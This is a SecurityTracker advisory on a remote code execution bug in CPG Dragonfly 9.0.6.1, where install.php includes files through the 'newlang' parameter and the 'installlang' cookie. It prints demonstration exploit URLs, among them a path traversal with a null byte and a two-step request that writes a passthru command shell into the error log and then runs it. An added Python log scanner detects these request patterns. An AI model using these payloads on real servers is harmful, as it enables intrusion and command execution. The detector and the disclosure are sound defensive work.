SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   CPG Dragonfly
Vendors:   CPG-Nuke
CPG Dragonfly Include File Bug in 'install.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015601
SecurityTracker URL:  http://securitytracker.com/id/1015601
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 8 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 9.0.6.1
Description:   rgod reported a vulnerability in CPG Dragonfly. A remote user can include and execute files on the target system.

The 'install.php' script does not properly validate user-supplied input in the 'newlang' parameter. A remote user can supply a specially crafted URL that causes the target system to include and execute a file located on the target system as PHP code. Any PHP code in the included file, including calls that run operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[path]/install.php?newlang=../../cpg_error.log%00

The 'installlang' cookie parameter is also affected.

A remote user can cause arbitrary PHP code to be written to a file on the system, such as the 'cpg_error.log' file. Then, the file can be included and executed using the vulnerability described above.

A demonstration exploit URL sequence is provided:

http://[target]/[path]/error.php?<?passthru($_GET[cmd]);?>
http://[target]/[path]/install.php?cmd=ls%20-la&newlang=../../cpg_error.log%00

The original advisory is available at:

http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html
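
The following log check for the request patterns described above is an added example, not part of the original advisory or of CPG Dragonfly. It assumes an access log in combined-log style with a trailing quoted Cookie field. The sample lines, the /df/ path and the rule names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines: combined-log style plus a trailing quoted Cookie
# field (an assumed log format); addresses and the /df/ path are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Feb/2006:10:00:01 +0000] "GET /df/install.php?newlang=english HTTP/1.1" 200 512 "-"',
    '198.51.100.9 - - [08/Feb/2006:10:00:05 +0000] "GET /df/error.php?%3C%3Fecho%201%3B%3F%3E HTTP/1.1" 404 210 "-"',
    '198.51.100.9 - - [08/Feb/2006:10:00:09 +0000] "GET /df/install.php?newlang=../../cpg_error.log%00 HTTP/1.1" 200 900 "-"',
    '198.51.100.9 - - [08/Feb/2006:10:00:12 +0000] "GET /df/install.php HTTP/1.1" 200 900 "installlang=..%2F..%2Fcpg_error.log%2500"',
]

LINE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d+ \S+ "(?P<cookie>[^"]*)"$')
TRAVERSAL = re.compile(r'\.\.[\\/]|\x00')

def suspicious_lang(value):
    """True if a language value holds a traversal sequence or a NUL byte."""
    return bool(TRAVERSAL.search(unquote(unquote(value))))  # tolerate double encoding

def classify(line):
    """Return the list of rule names a single log line triggers."""
    m = LINE.search(line)
    if not m:
        return []
    path, _, query = m.group('target').partition('?')
    hits = []
    if path.endswith('/install.php'):
        # 'newlang' query parameter, as named in the advisory
        for value in parse_qs(query).get('newlang', []):
            if suspicious_lang(value):
                hits.append('newlang-traversal')
        # 'installlang' cookie, which the advisory says is also affected
        for part in m.group('cookie').split(';'):
            name, _, value = part.strip().partition('=')
            if name == 'installlang' and suspicious_lang(value):
                hits.append('installlang-traversal')
    # PHP open tag in an error.php request: code being written to the error log
    if path.endswith('/error.php') and '<?' in unquote(query):
        hits.append('php-tag-in-error-request')
    return hits

def scan(lines):
    """Map line index -> triggered rules, skipping clean lines."""
    return {i: h for i, line in enumerate(lines) if (h := classify(line))}

if __name__ == '__main__':
    for idx, rules in scan(SAMPLE_LOG).items():
        print(idx, rules)
```

A 'php-tag-in-error-request' hit followed by a traversal hit from the same client matches the two-step sequence described in this entry.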

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.cpgnuke.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  CPGNuke Dragonfly 9.0.6.1 remote commands execution

http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html

rgod
 
 



Copyright 2021, SecurityGlobal.net LLC